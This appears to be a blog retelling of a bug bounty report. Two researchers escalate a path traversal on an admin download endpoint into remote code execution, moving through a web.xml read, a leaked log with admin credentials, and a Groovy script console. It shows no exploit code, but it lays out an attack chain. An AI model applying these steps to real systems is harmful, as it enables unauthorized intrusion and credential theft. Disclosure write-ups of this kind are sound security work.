Abdullah Nawaf, a devoted bug bounty hunter with a remarkable reputation on BugCrowd, is renowned for his passion for discovery and the pursuit of high-impact vulnerabilities. Together with his partner Orwa Atyat, they accomplished a significant feat by transforming a limited path traversal vulnerability into a fully-fledged remote code execution (RCE) exploit, resulting in a handsome reward of $40,000. Let’s delve into the intricate details of their successful journey.
Their journey commenced with routine reconnaissance on a specific target subdomain, http://admin.target.com:8443. Initially encountering a 404 response, many bug hunters would have abandoned further investigation. However, Abdullah’s keen intuition drove him to delve deeper into the domain. By employing fuzzing techniques on the URL, they stumbled upon an endpoint at /admin/Download, which returned a 200 OK status but an empty response. This discovery hinted at the presence of a potentially exploitable feature, as outlined in a report on Medium.
Further exploration led them down the path of testing for Local File Inclusion (LFI) and path traversal vulnerabilities within the admin path. They discovered that the /download endpoint accepted a parameter named ‘filename.’ Accessing http://admin.target.com:8443/admin/download?filename=/js/main.js revealed the contents of the JavaScript file. However, a limitation was apparent – the function only granted access to files within the /admin/ directory.
Undeterred by the initial setbacks, Abdullah attempted to access /WEB-INF/web.xml, a file containing crucial information. This strategic move proved fruitful as it unveiled three URLs, including one for an incident-report. Visiting this endpoint triggered the download of a live log file, unveiling unexpected revelations that paved the way for significant discoveries.
Inside the log file, Abdullah stumbled upon sensitive data – admin credentials, including an MD5-hashed password. By leveraging these credentials, he successfully logged into the admin panel, unveiling an intriguing function called export_step2.xhtml, which housed a Groovy console for executing Groovy scripts.
Accessing the Groovy console exposed the potential for remote code execution (RCE); however, executing commands did not yield any visible output initially. This led to the critical question of where the command output was being concealed. Reflecting on the situation, Abdullah recalled the log file as a potential gateway for uncovering the RCE output. By running commands through the Groovy console, he could leverage the log file to retrieve the results of his commands.
The escalation of impact was facilitated by a straightforward cycle: logging in with the discovered credentials, accessing the Groovy console, executing commands, and retrieving the command output from the logs. This intricate chain of vulnerabilities not only met the criteria for RCE but also underscored the value of thorough exploration and persistence in cybersecurity.
Abdullah’s submission of reports on both the RCE and credentials discovery culminated in a generous payout of $40,000 from the bug bounty program. This experience exemplifies the critical role of creativity and persistence in navigating the challenging landscape of cybersecurity. Each bug bounty hunt presents an opportunity for groundbreaking discoveries if one is willing to delve deeper.
In conclusion, Abdullah Nawaf and Orwa Atyat’s successful journey serves as a testament to the value of relentless exploration and innovative problem-solving in the realm of cybersecurity. Their ability to unravel complex vulnerabilities and leverage them for impactful exploits underscores the significance of diligence and creativity in the ever-evolving field of bug hunting.